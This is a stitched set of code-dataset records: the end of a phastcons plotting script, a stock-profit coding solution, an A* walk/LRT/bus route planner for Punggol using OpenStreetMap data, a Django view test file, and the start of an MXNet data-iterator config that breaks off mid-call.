optparser.add_option('-t','--title',dest='title',help=\"title of the figure. Default: 'Average Phastcons around the Center of Sites'\",default= 'Average Phastcons around the Center of Sites')\n optparser.add_option('-d','--phasdb',dest='phasdb',help= 'The directory to store phastcons scores in the server')\n optparser.add_option('-o','--outimg',dest='outimg',help= 'output image file prefix')\n optparser.add_option(\"-l\",\"--bed-label\",dest=\"bedlabel\",type=\"string\",action=\"append\",\n help=\"the BED file labels in the figure. No space is allowed. This option should be used same times as -w option, and please input them in the same order as BED files. default: will use the BED file filename as labels.\")\n optparser.add_option(\"-h\",\"--help\",action=\"help\",help=\"Show this help message and exit.\")\n\n (options,bedfiles) = optparser.parse_args()\n options.pf_res = options.w / 100 # get 100 points to plot\n options.w = options.pf_res * 100 # trim\n\n bedfiles = list(map(os.path.abspath,bedfiles))\n bedfilenames = list(map(os.path.basename,bedfiles))\n\n bedfilenum = len(bedfiles)\n\n if bedfilenum < 1 or not options.phasdb:\n optparser.print_help()\n sys.exit(1)\n\n if options.bedlabel and len(options.bedlabel) == bedfilenum:\n bedlabel = options.bedlabel\n else: # or use the filename\n bedlabel = [os.path.basename(x) for x in bedfiles]\n\n if options.height < 10:\n error(\"Height can not be lower than 10!\")\n sys.exit(1)\n if options.width < 10:\n error(\"Width can not be smaller than 10!\")\n sys.exit(1)\n\n # check the files\n for f in bedfiles:\n if not os.path.isfile(f):\n error(\"%s is not valid!\" % f)\n sys.exit(1)\n\n # check phastcons db\n if not os.path.isfile(options.phasdb):\n error(\"%s is not valid!\" % options.phasdb)\n sys.exit(1)\n\n if not options.phasdb:\n error(\"%s has no valid phastcons db bw files!\" % options.phasdb)\n sys.exit(1)\n\n info(\"number of bed files: %d\" % bedfilenum)\n\n avgValues = []\n \n # for each bed file\n for f 
in bedfiles:\n info(\"extract phastcons scores using %s\" % f)\n scores = extract_phastcons(f, options.phasdb, options.w, options.pf_res)\n if not scores:\n #PRESET to 100 0s\n scores = [0]*100\n avgValues.append(scores)\n if options.w == 4000:\n ## 100 points for 4000, 40bp resolution\n print((\"\\t\".join([str(avgValues[0][i]) for i in [12,25,38,50,62,75,88]])))\n elif options.w == 400:\n print((\"\\t\".join([str(avgValues[0][i]) for i in [45,48,50,52,55]])))\n olddir = os.path.dirname(options.outimg)\n makeBmpFile(avgValues,olddir, options.outimg ,options.height,options.width,options.w,options.pf_res,options.title,bedlabel)\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n sys.stderr.write(\"User interrupt me! ;-) See you!\\n\")\n sys.exit(0)","sub_path":"modules/scripts/conservation_onebw_plot.py","file_name":"conservation_onebw_plot.py","file_ext":"py","file_size_in_byte":15322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"291096565","text":"# Say you have an array for which the ith element is the price of a given stock on day i.\n# If you were only permitted to complete at most one transaction (i.e., buy one and sell one share of the stock), design an algorithm to find the maximum profit.\n# Note that you cannot sell a stock before you buy one.\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if len(prices) == 0:\n return 0\n \n max_profit = 0\n cur_min = prices[0]\n \n for i in range(1, len(prices)):\n if cur_min < prices[i]:\n max_profit = max(max_profit, prices[i] - cur_min)\n else:\n cur_min = prices[i]\n \n return max_profit\n","sub_path":"121. Best Time to Buy and Sell Stock.py","file_name":"121. 
Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"254027398","text":"from flask import Flask, render_template\nimport heapq\nimport folium\nimport math\nimport networkx as nx\nimport time\nfrom datetime import datetime\nimport osmnx as ox\nfrom osmnx import settings\nfrom osmnx.utils import make_str, log\nfrom osmnx.geo_utils import get_largest_component\nfrom osmnx.downloader import overpass_request\nfrom osmnx.errors import *\nimport overpy\nimport codes.findShortestBusRoute as findShortestBusRoute\nimport codes.PlotShortestBusRouteHelperBus as plotShortestBusRoute\n\ndef get_node(element):\n \"\"\"\n Convert an OSM node element into the format for a networkx node.\n\n Parameters\n ----------\n element : dict\n an OSM node element\n\n Returns\n -------\n dict\n \"\"\"\n useful_tags_node = ['ref', 'railway']\n node = {}\n node['y'] = element['lat']\n node['x'] = element['lon']\n node['osmid'] = element['id']\n\n if 'tags' in element:\n for useful_tag in useful_tags_node:\n if useful_tag in element['tags']:\n node[useful_tag] = element['tags'][useful_tag]\n return node\n\n\ndef parse_osm_nodes_paths(osm_data):\n \"\"\"\n Construct dicts of nodes and paths with key=osmid and value=dict of\n attributes.\n Parameters\n ----------\n osm_data : dict\n JSON response from from the Overpass API\n Returns\n -------\n nodes, paths : tuple\n \"\"\"\n\n nodes = {}\n paths = {}\n for element in osm_data['elements']:\n if element['type'] == 'node':\n key = element['id']\n nodes[key] = get_node(element)\n elif element['type'] == 'way': # osm calls network paths 'ways'\n key = element['id']\n paths[key] = ox.get_path(element)\n\n return nodes, paths\n\n\ndef create_graph(mrt_response_json, name='unnamed', retain_all=True, bidirectional=False):\n \"\"\"\n Create a networkx graph from Overpass API HTTP response objects.\n\n Parameters\n ----------\n 
response_jsons : list\n list of dicts of JSON responses from from the Overpass API\n name : string\n the name of the graph\n retain_all : bool\n if True, return the entire graph even if it is not connected\n bidirectional : bool\n if True, create bidirectional edges for one-way streets\n\n Returns\n -------\n networkx multidigraph\n \"\"\"\n\n log('Creating networkx graph from downloaded OSM data...')\n start_time = time.time()\n\n # make sure we got data back from the server requests\n elements = []\n # for response_json in response_jsons:\n elements.extend(mrt_response_json['elements'])\n if len(elements) < 1:\n raise EmptyOverpassResponse('There are no data elements in the response JSON objects')\n\n # create the graph as a MultiDiGraph and set the original CRS to default_crs\n G = nx.MultiDiGraph(name=name, crs=settings.default_crs)\n\n # extract nodes and paths from the downloaded osm data\n nodes = {}\n paths = {}\n # for osm_data in response_jsons:\n nodes_temp, paths_temp = parse_osm_nodes_paths(mrt_response_json)\n for key, value in nodes_temp.items():\n nodes[key] = value\n for key, value in paths_temp.items():\n paths[key] = value\n\n # add each osm node to the graph\n for node, data in nodes.items():\n G.add_node(node, **data)\n\n # add each osm way (aka, path) to the graph\n G = ox.add_paths(G, paths, bidirectional=bidirectional)\n\n # retain only the largest connected component, if caller did not\n # set retain_all=True\n if not retain_all:\n G = get_largest_component(G)\n\n log('Created graph with {:,} nodes and {:,} edges in {:,.2f} seconds'.format(len(list(G.nodes())),\n len(list(G.edges())),\n time.time() - start_time))\n\n # add length (great circle distance between nodes) attribute to each edge to\n # use as weight\n if len(G.edges) > 0:\n G = ox.add_edge_lengths(G)\n\n return G\n\n# LRT fare based on distance travelled\ndef lrtFareCal(distance):\n if distance <= 3.2:\n print(\"Student Fare: $0.42\")\n print(\"Adult Fare: $0.92\")\n 
print(\"Senior Citizen Fare: $0.59\")\n elif 4.2 >= distance > 3.2:\n print(\"Student Fare: $0.47\")\n print(\"Adult Fare: $1.02\")\n print(\"Senior Citizen Fare: $0.66\")\n elif 5.2 >= distance > 4.2:\n print(\"Student Fare: $0.52\")\n print(\"Adult Fare: $1.12\")\n print(\"Senior Citizen Fare: $0.73\")\n elif 6.2 >= distance > 5.2:\n print(\"Student Fare: $0.47\")\n print(\"Adult Fare: $1.22\")\n print(\"Senior Citizen Fare: $0.80\")\n\n\n# finding which mrt station is closest to the start/end point\ndef lrt_nearnode(srctomrt):\n nearnode = []\n for k in mrtNodeList:\n if k.get(\"railway\") == \"station\" or k.get(\"railway\") == \"stop\":\n h = heuristic(mrtn_latlon(srctomrt), mrtn_latlon(k.get(\"osmid\")))\n heapq.heappush(nearnode, (h, k.get(\"osmid\")))\n return heapq.heappop(nearnode)\n\n\n# retrieving lat/lon coordinates for LRT via OSMID\ndef mrtn_latlon(osmid):\n for k in mrtNodeList:\n if k.get(\"osmid\") == osmid:\n return k.get(\"y\"), k.get(\"x\")\n\n\n# retrieving lat/lon coordinates for walk via OSMID\ndef walk_latlon(osmid):\n for k in walkNodeList:\n if k.get(\"osmid\") == osmid:\n return k.get(\"x\"), k.get(\"y\")\n\n\n# calculating heuristic between two lat/lon points\ndef heuristic(start, end):\n lat1, lon1 = start[0], start[1]\n lat2, lon2 = end[0], end[1]\n radius = 6371 # km\n\n distlat = math.radians(lat2 - lat1)\n distlon = math.radians(lon2 - lon1)\n a = math.sin(distlat / 2) * math.sin(distlat / 2) + math.cos(math.radians(lat1)) \\\n * math.cos(math.radians(lat2)) * math.sin(distlon / 2) * math.sin(distlon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n dist = radius * c * 1000\n\n return dist\n\n\n# ASTAR ALGORITHM\ndef lrt_astar(start_point, end_point, use):\n closepath = {}\n path = []\n routeq = []\n finalret = []\n stat = []\n strt = 0\n\n # finding start station (working)\n if use == \"no\":\n for k in mrtEdgeList:\n h = heuristic(mrtn_latlon(start_point), mrtn_latlon(k[0][1]))\n if h > 30:\n heapq.heappush(stat, (h, 
k[0][1]))\n strt = heapq.heappop(stat)[1]\n elif use == \"yes\":\n strt = start_point\n\n # pushing start point into heapq queue (heuristic, length(dist), parent(key), current(value))\n heapq.heappush(routeq, (0, 0, None, strt))\n closepath[strt] = None\n\n while True:\n temp = heapq.heappop(routeq)\n\n # check if we reach end point node\n if heuristic(mrtn_latlon(temp[3]), mrtn_latlon(end_point)) < 60:\n path.append(temp[3])\n rear = temp[2]\n\n # path list to append all osmid by key in closepath with the first being the end node\n while rear is not None:\n path.append(rear)\n rear = closepath.get(rear)\n\n # reverse the path list into start to end\n path = path[::-1]\n finalret.append(path)\n finalret.append(temp[1])\n return finalret\n else:\n for i in mrtEdgeList:\n if i[0][0] == temp[3]:\n if i[0][1] in closepath:\n continue\n else:\n he = heuristic(mrtn_latlon(i[0][1]), mrtn_latlon(end_point))\n cur_length = i[1].get('length')\n heapq.heappush(routeq,\n ((he + temp[1] + cur_length), cur_length + temp[1], temp[3], i[0][1]))\n # adding previous path to close path dict to prevent an infinite loop of short path\n closepath[i[0][1]] = temp[3]\n\n\n# ASTAR ALGORITHM\ndef walk_astar(start_point, end_point):\n closepath = {}\n path = []\n routeq = []\n finalret = []\n\n # pushing start point into heapq queue (heuristic, length(dist), parent(key), current(value))\n heapq.heappush(routeq, (0, 0, None, start_point))\n closepath[start_point] = None\n\n while True:\n temp = heapq.heappop(routeq)\n # check if we reach end point node\n if temp[3] == end_point:\n path.append(temp[3])\n rear = temp[2]\n\n # path list to append all osmid by key in closepath with the first being the end node\n while rear is not None:\n path.append(rear)\n rear = closepath.get(rear)\n\n # reverse the path list into start to end\n path = path[::-1]\n finalret.append(path)\n finalret.append(temp[1])\n return finalret\n else:\n for i in walkEdgeList:\n if i[0][0] == temp[3]:\n if i[0][1] in 
closepath:\n continue\n else:\n h = heuristic(walk_latlon(i[0][1]), walk_latlon(end_point))\n cur_length = i[1].get('length')\n heapq.heappush(routeq, (h + cur_length + temp[1], cur_length + temp[1], temp[3], i[0][1]))\n # adding previous path to close path dict to prevent an infinite loop of short path\n closepath[i[0][1]] = temp[3]\n\n\n# conversion of route to coords\ndef convertRoute(coords):\n output = []\n for x in range(len(coords)): # Parent Array\n for i in range(len(coords[x])): # Inner Array\n output.append([coords[x][i][1], coords[x][i][0]])\n return output\n\n\n# main code\npunggol = (1.403948, 103.909048)\ndistance = 2000\n\n# data creation and storing\nmrt_query_str = '[out:json][timeout:180];(relation[\"network\"=\"Singapore Rail\"][\"route\"=\"monorail\"](1.4011,103.8977,1.4154,103.9231);>;);out;'\nmrt_response_json = overpass_request(data={'data': mrt_query_str}, timeout=180)\nG_lrt = create_graph(mrt_response_json)\nG_walk = ox.graph_from_point(punggol, distance=distance, truncate_by_edge=True, network_type='walk')\nG_bus = ox.graph_from_point(punggol, distance=distance, network_type='drive_service')\n\napi = overpy.Overpass()\n\n# storing all nodes into a list\nwalkNodeList = list(G_walk.nodes.values())\nwalkEdgeList = list(G_walk.edges.items())\nmrtNodeList = list(G_lrt.nodes.values())\nmrtEdgeList = list(G_lrt.edges.items())\n\npe = []\npw = []\nfor k in mrtNodeList: # check for nodes which are stations\n try:\n if \"PE\" in k.get('ref'):\n pe.append(k.get('osmid'))\n if \"PW\" in k.get('ref'):\n pw.append(k.get('osmid'))\n except: # to catch and skip noneType iterations\n continue\n\n# testing algorithmn speed\nstart_time = time.time()\n# user input (GUI TEAM, user input in text area will be stored here)\nsrc = \"Block 130, Edgedale Plains, Punggol\" # 406B, Northshore Drive, Punggol - Nibong, Punggol\n# punggol will return punggol mrt coordinates 406B, Northshore Drive, Punggol - 220A Sumang Lane, Singapore 821220 - Blk 126A, Punggol Field, 
Punggol - Waterway Cascadia, 314A, Punggol Way, Punggol\ndes = \"406B, Northshore Drive, Punggol\" # random hdb 60 Punggol East, Singapore 828825\nstartpoint = ox.geocode(src)\nendpoint = ox.geocode(des)\n\n# finding nearest nodes required\nstrtpt = ox.get_nearest_node(G_walk, startpoint, method='euclidean', return_dist=True)\nendpt = ox.get_nearest_node(G_walk, endpoint, method='euclidean', return_dist=True)\n\n# locateStrtLrt and lcoateEndLrt is only used to locate the location of both mrt\nlocateStrtLrt = ox.get_nearest_node(G_lrt, startpoint, method='euclidean', return_dist=True)\nlcoateEndLrt = ox.get_nearest_node(G_lrt, endpoint, method='euclidean', return_dist=True)\nlrtstart = lrt_nearnode(locateStrtLrt[0])[1]\nlrtend = lrt_nearnode(lcoateEndLrt[0])[1]\n\nif (lrtstart == lrtend or (lrtstart == 6587709456 and lrtend == 6587709457) or (lrtstart == 6587709457 and\n lrtend == 6587709456)): # and (start point bus stop node is same as end point):\n final = walk_astar(strtpt[0], endpt[0])\n\n # plotting map to folium\n m = ox.plot_route_folium(G_walk, final[0], route_color='blue', route_width=5, tiles=\"OpenStreetMap\",\n popup_attribute=\"There is no LRT to bring you to your destination, please walk.\")\n m.save('templates/astaralgo_walklrtbus.html')\nelse:\n reachLRT = ox.get_nearest_node(G_walk, mrtn_latlon(lrtstart), method='euclidean', return_dist=True)\n leaveLRT = ox.get_nearest_node(G_walk, mrtn_latlon(lrtend), method='euclidean', return_dist=True)\n\n eastlrt = 0\n westlrt = 0\n for i in mrtNodeList:\n mrtid = i.get('osmid')\n if mrtid == lrtstart and lrtstart in pe:\n eastlrt += 1\n # print(\"scenario1\")\n elif mrtid == lrtstart and lrtstart in pw:\n # print(\"scenario2\")\n westlrt += 1\n elif mrtid == lrtend and lrtend in pe:\n # print(\"scenario3\")\n eastlrt += 1\n elif mrtid == lrtend and lrtend in pw:\n # print(\"scenario4\")\n westlrt += 1\n elif westlrt == 2 or eastlrt == 2: # both lrt station in the same lrt loop\n break\n elif westlrt == 1 and 
eastlrt == 1: # both lrt station in different lrt loop\n # print(\"break\")\n break\n\n m = folium.Map(location=punggol, distance=distance, zoom_start=15)\n\n if westlrt == 1 and eastlrt == 1: # if both stations are found on both loop (west loop and east loop)\n if lrtstart in pw:\n lrtfirst = lrt_astar(lrt_nearnode(lrtstart)[1], 6587709456, \"no\")\n lrtsecond = lrt_astar(6587709457, lrt_nearnode(lrtend)[1], \"yes\")\n elif lrtstart in pe:\n lrtfirst = lrt_astar(lrt_nearnode(lrtstart)[1], 6587709457, \"no\")\n lrtsecond = lrt_astar(6587709456, lrt_nearnode(lrtend)[1], \"yes\")\n\n radius = 100\n endBusStopNode = None\n endLRTBusStopNode = None\n\n while endBusStopNode is None:\n endBusStopNode = api.query(\n \"node(around:\" + str(radius) + \",\" + str(endpoint[0]) + \",\" + str(endpoint[\n 1]) + \")[highway=bus_stop];out;\")\n\n if len(endBusStopNode.nodes) > 0:\n endBusStopNode = endBusStopNode.nodes[0]\n endBusStopLatLon = (endBusStopNode.lat, endBusStopNode.lon)\n endBusStopCode = endBusStopNode.tags['asset_ref']\n else:\n endBusStopNode = None\n radius += 50\n\n endLRTLatLon = mrtn_latlon(lcoateEndLrt[0])\n\n while endLRTBusStopNode is None:\n endLRTBusStopNode = api.query(\n \"node(around:\" + str(radius) + \",\" + str(endLRTLatLon[0]) + \",\" + str(endLRTLatLon[\n 1]) + \")[highway=bus_stop];out;\")\n\n if len(endLRTBusStopNode.nodes) > 0:\n endLRTBusStopNode = endLRTBusStopNode.nodes[0]\n endLRTBusStopLatLon = (endLRTBusStopNode.lat, endLRTBusStopNode.lon)\n endLRTBusStopCode = endLRTBusStopNode.tags['asset_ref']\n else:\n endLRTBusStopNode = None\n radius += 50\n\n if endBusStopNode.id == endLRTBusStopNode.id:\n # algo testing walk and lrt\n walkToStation = walk_astar(strtpt[0], reachLRT[0])\n walkFromStation = walk_astar(leaveLRT[0], endpt[0])\n\n # converting all osmnx nodes to coordinates\n walkToStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkToStation[0]))\n walkFromStation[0] = 
convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkFromStation[0]))\n lrtfirst[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtfirst[0]))\n lrtsecond[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtsecond[0]))\n\n # calculating estimated time, cost, distance to reach the destination\n statDist = 10300 / 14\n totalDistLRT = (lrtfirst[1] + lrtsecond[1]) / 1000 # convert to meters to km\n now = datetime.now()\n timenow = now.strftime(\"%H\")\n waitTime = 0\n if \"10\" > timenow > \"6\":\n print(\"--- PEAK HOUR ---\")\n waitTime = 3\n else:\n print(\"--- NON-PEAK HOUR ---\")\n waitTime = 7\n lrtFareCal(totalDistLRT) # call fare function\n numStation = math.floor(totalDistLRT / statDist + 2)\n totatTimeLRT = numStation + ((totalDistLRT * 1000) / (45000 / 60)) + waitTime # avg mrt speed 45km/hr - 750m per minute\n totalDistWalk = (walkToStation[1] + walkFromStation[1]) / 1000 # convert to meters to km\n estwalk = (totalDistWalk * 1000) / (5000 / 60) # avg walking speed 1.4m/min - 5km/hr\n print(\"Time: \" + str(round(totatTimeLRT + estwalk)) + \" minutes\" + \"\\nDistance: \" +\n str(round((totalDistWalk + totalDistLRT), 2)) + \" km\\nTransfer: 1, Punggol Station\")\n\n # plotting on folium map\n folium.PolyLine(lrtfirst[0], color=\"red\", weight=2, opacity=1,\n tooltip=\"Change LRT at Punggol Station.\").add_to(m)\n folium.PolyLine(lrtsecond[0], color=\"red\", weight=2, opacity=1,\n tooltip=\"Continue here to your destination.\").add_to(m)\n folium.PolyLine(([lrtfirst[0][-1]] + [lrtsecond[0][0]]), color=\"blue\", weight=2, opacity=1,\n tooltip=\"Transit LRT here!\").add_to(m)\n folium.PolyLine(([startpoint] + walkToStation[0] + [lrtfirst[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([lrtsecond[0][-1]] + walkFromStation[0] + [endpoint]), color=\"blue\", weight=2, opacity=1).add_to(m)\n m.save('templates/astaralgo_walklrtbus.html')\n else:\n # algo testing walk and lrt\n walkToStation = 
walk_astar(strtpt[0], reachLRT[0])\n\n paths = findShortestBusRoute.findShortestBusRoute(int(endLRTBusStopCode), int(endBusStopCode))\n bus = plotShortestBusRoute.findPath(paths)\n\n walkFromBusStop = walk_astar(endLRTBusStopNode.id, endpt[0])\n\n # converting all osmnx nodes to coordinates\n walkToStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkToStation[0]))\n walkFromBusStop[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkFromBusStop[0]))\n bus[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_bus, bus[0]))\n lrtfirst[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtfirst[0]))\n lrtsecond[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtsecond[0]))\n\n # calculating estimated time, cost, distance to reach the destination\n statDist = 10300 / 14\n totalDistLRT = (lrtfirst[1] + lrtsecond[1]) / 1000 # convert to meters to km\n now = datetime.now()\n timenow = now.strftime(\"%H\")\n waitTime = 0\n if \"10\" > timenow > \"6\":\n print(\"--- PEAK HOUR ---\")\n waitTime = 3\n else:\n print(\"--- NON-PEAK HOUR ---\")\n waitTime = 7\n lrtFareCal(totalDistLRT) # call fare function\n numStation = math.floor(totalDistLRT / statDist + 2)\n totatTimeLRT = numStation + (\n (totalDistLRT * 1000) / (45000 / 60)) + waitTime # avg mrt speed 45km/hr - 750m per minute\n totalDistWalk = (walkToStation[1] + walkFromBusStop[1]) / 1000 # convert to meters to km\n estwalk = (totalDistWalk * 1000) / (5000 / 60) # avg walking speed 1.4m/min - 5km/hr\n print(\"Time: \" + str(round(totatTimeLRT + estwalk)) + \" minutes\" + \"\\nDistance: \" +\n str(round((totalDistWalk + totalDistLRT), 2)) + \" km\\nTransfer: 1, Punggol Station\")\n\n # plotting on folium map\n folium.PolyLine(lrtfirst[0], color=\"red\", weight=2, opacity=1,\n tooltip=\"Change LRT at Punggol Station.\").add_to(m)\n folium.PolyLine(lrtsecond[0], color=\"red\", weight=2, opacity=1,\n tooltip=\"Continue here to your 
destination.\").add_to(m)\n folium.PolyLine(bus[0], color=\"green\", weight=2, opacity=1,\n tooltip=\"Change from Lrt to Bus.\").add_to(m)\n folium.PolyLine(([lrtfirst[0][-1]] + [lrtsecond[0][0]]), color=\"blue\", weight=2, opacity=1,\n tooltip=\"Transit LRT here!\").add_to(m)\n folium.PolyLine(([startpoint] + walkToStation[0] + [lrtfirst[0][0]]), color=\"blue\", weight=2, opacity=1,\n tooltip=\"Walk to Bus stop\").add_to(m)\n folium.PolyLine(([lrtsecond[0][-1]] + [bus[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([bus[0][-1]] + walkFromBusStop[0] + [endpoint]), color=\"blue\", weight=2, opacity=1).add_to(m)\n m.save('templates/astaralgo_walklrtbus.html')\n\n else: # if both stations are found on the same lrt loop\n # algo testing walk and lrt\n lrtfinal = lrt_astar(lrt_nearnode(lrtstart)[1], lrt_nearnode(lrtend)[1], \"no\")\n\n radius = 100\n endBusStopNode = None\n endLRTBusStopNode = None\n\n while endBusStopNode is None:\n endBusStopNode = api.query(\n \"node(around:\" + str(radius) + \",\" + str(endpoint[0]) + \",\" + str(endpoint[\n 1]) + \")[highway=bus_stop];out;\")\n\n if len(endBusStopNode.nodes) > 0:\n endBusStopNode = endBusStopNode.nodes[0]\n endBusStopLatLon = (endBusStopNode.lat, endBusStopNode.lon)\n endBusStopCode = endBusStopNode.tags['asset_ref']\n else:\n endBusStopNode = None\n radius += 50\n\n endLRTLatLon = mrtn_latlon(lcoateEndLrt[0])\n\n radius = 100\n while endLRTBusStopNode is None:\n endLRTBusStopNode = api.query(\n \"node(around:\" + str(radius) + \",\" + str(endLRTLatLon[0]) + \",\" + str(endLRTLatLon[\n 1]) + \")[highway=bus_stop];out;\")\n\n if len(endLRTBusStopNode.nodes) > 0:\n endLRTBusStopNode = endLRTBusStopNode.nodes[0]\n endLRTBusStopLatLon = (endLRTBusStopNode.lat, endLRTBusStopNode.lon)\n endLRTBusStopCode = endLRTBusStopNode.tags['asset_ref']\n else:\n endLRTBusStopNode = None\n radius += 50\n\n if endBusStopNode.id == endLRTBusStopNode.id:\n walkToStation = walk_astar(strtpt[0], reachLRT[0])\n 
walkFromStation = walk_astar(leaveLRT[0], endpt[0])\n\n # converting all osmnx nodes to coordinates\n walkToStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkToStation[0]))\n walkFromStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkFromStation[0]))\n lrtfinal[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtfinal[0]))\n\n # calculating estimated time, cost, distance to reach the destination\n statDist = 10300 / 14\n totalDistLRT = (lrtfinal[1]) / 1000 # convert to meters to km\n now = datetime.now()\n timenow = now.strftime(\"%H\")\n waitTime = 0\n if \"10\" > timenow > \"6\":\n print(\"--- PEAK HOUR ---\")\n waitTime = 3\n else:\n print(\"--- NON-PEAK HOUR ---\")\n waitTime = 7\n lrtFareCal(totalDistLRT) # call fare function\n numStation = math.floor(totalDistLRT / statDist + 2)\n totatTimeLRT = numStation + (\n (totalDistLRT * 1000) / (45000 / 60)) + waitTime # avg mrt speed 45km/hr - 750m per minute\n totalDistWalk = (walkToStation[1] + walkFromStation[1]) / 1000 # convert to meters to km\n estwalk = (totalDistWalk * 1000) / (5000 / 60) # avg walking speed 1.4m/min - 5km/hr\n print(\"Time: \" + str(round(totatTimeLRT + estwalk)) + \" minutes\" + \"\\nDistance: \" +\n str(round((totalDistWalk + totalDistLRT), 2)) + \" km\\nTransfer: None.\")\n\n # plotting map to folium\n folium.PolyLine(lrtfinal[0], color=\"red\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([startpoint] + walkToStation[0] + [lrtfinal[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([lrtfinal[0][-1]] + walkFromStation[0] + [endpoint]), color=\"blue\", weight=2, opacity=1).add_to(m)\n m.save('templates/astaralgo_walklrtbus.html')\n else:\n walkToStation = walk_astar(strtpt[0], reachLRT[0])\n\n paths = findShortestBusRoute.findShortestBusRoute(int(endLRTBusStopCode), int(endBusStopCode))\n bus = plotShortestBusRoute.findPath(paths)\n\n walkFromBusStop = walk_astar(endBusStopNode.id, endpt[0])\n\n # 
converting all osmnx nodes to coordinates\n walkToStation[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkToStation[0]))\n walkFromBusStop[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_walk, walkFromBusStop[0]))\n bus[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_bus, bus[0]))\n lrtfinal[0] = convertRoute(ox.plot.node_list_to_coordinate_lines(G_lrt, lrtfinal[0]))\n\n # calculating estimated time, cost, distance to reach the destination\n statDist = 10300 / 14\n totalDistLRT = (lrtfinal[1]) / 1000 # convert to meters to km\n now = datetime.now()\n timenow = now.strftime(\"%H\")\n waitTime = 0\n if \"10\" > timenow > \"6\":\n print(\"--- PEAK HOUR ---\")\n waitTime = 3\n else:\n print(\"--- NON-PEAK HOUR ---\")\n waitTime = 7\n lrtFareCal(totalDistLRT) # call fare function\n numStation = math.floor(totalDistLRT / statDist + 2)\n totatTimeLRT = numStation + (\n (totalDistLRT * 1000) / (45000 / 60)) + waitTime # avg mrt speed 45km/hr - 750m per minute\n totalDistWalk = (walkToStation[1] + walkFromBusStop[1]) / 1000 # convert to meters to km\n estwalk = (totalDistWalk * 1000) / (5000 / 60) # avg walking speed 1.4m/min - 5km/hr\n print(\"Time: \" + str(round(totatTimeLRT + estwalk)) + \" minutes\" + \"\\nDistance: \" +\n str(round((totalDistWalk + totalDistLRT), 2)) + \" km\\nTransfer: None.\")\n\n # plotting map to folium\n folium.PolyLine(lrtfinal[0], color=\"red\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(bus[0], color=\"green\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([startpoint] + walkToStation[0] + [lrtfinal[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([lrtfinal[0][-1]] + [bus[0][0]]), color=\"blue\", weight=2, opacity=1).add_to(m)\n folium.PolyLine(([bus[0][-1]] + walkFromBusStop[0] + [endpoint]), color=\"blue\", weight=2, opacity=1).add_to(m)\n m.save('templates/astaralgo_walklrtbus.html')\n\nprint(\"--- %s seconds to run all calculations ---\" % round((time.time() - 
start_time), 2))","sub_path":"development_codes(scripts_unused_in_application)/walk_lrt_bus_algo(finalised).py","file_name":"walk_lrt_bus_algo(finalised).py","file_ext":"py","file_size_in_byte":27428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"641302962","text":"import json\nimport unittest\n\nfrom django.test import Client\nfrom django.urls import reverse\n\nimport example_app.views\n\n\nclass ExampleTestCase(unittest.TestCase):\n\n def test_query_json(self):\n response = Client().get(reverse(example_app.views.words),\n {'query': u'er'},\n HTTP_ACCEPT='application/json')\n data = json.loads(response.content.decode('utf-8'))\n self.assertEqual(data['matches'],\n ['intermediary', 'otherwise', 'shatters'])\n\n def test_query_plain(self):\n response = Client().get(reverse(example_app.views.words),\n {'query': u'er'})\n self.assertEqual(response.content,\n b'intermediary\\notherwise\\nshatters\\n')\n\n def test_add_word(self):\n Client().post(reverse(example_app.views.words),\n data='foo bar baz', content_type='text/plain')\n self.assertTrue(u'bar' in example_app.views.all_words)\n\n def test_all_words(self):\n response = Client().get(reverse(example_app.views.words))\n self.assertTrue(response.streaming)\n","sub_path":"example/example_app/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"480038361","text":"import mxm.release.googlenet.main.config as cfg\nimport mxnet as mx\n\n\ndef get_rec_iter(kv=None):\n if kv:\n (rank, nworker) = (kv.rank, kv.num_workers)\n else:\n (rank, nworker) = (0, 1)\n train = mx.io.ImageRecordIter(\n path_imgrec = cfg.data_train,\n label_width = 1,\n # mean_r = cfg.rgb_mean[0],\n # mean_g = cfg.rgb_mean[1],\n # mean_b = cfg.rgb_mean[2],\n scale=1.0 / 255,\n data_name = 'data',\n label_name = 'softmax_label',\n data_shape = cfg.image_shape,\n batch_size = 
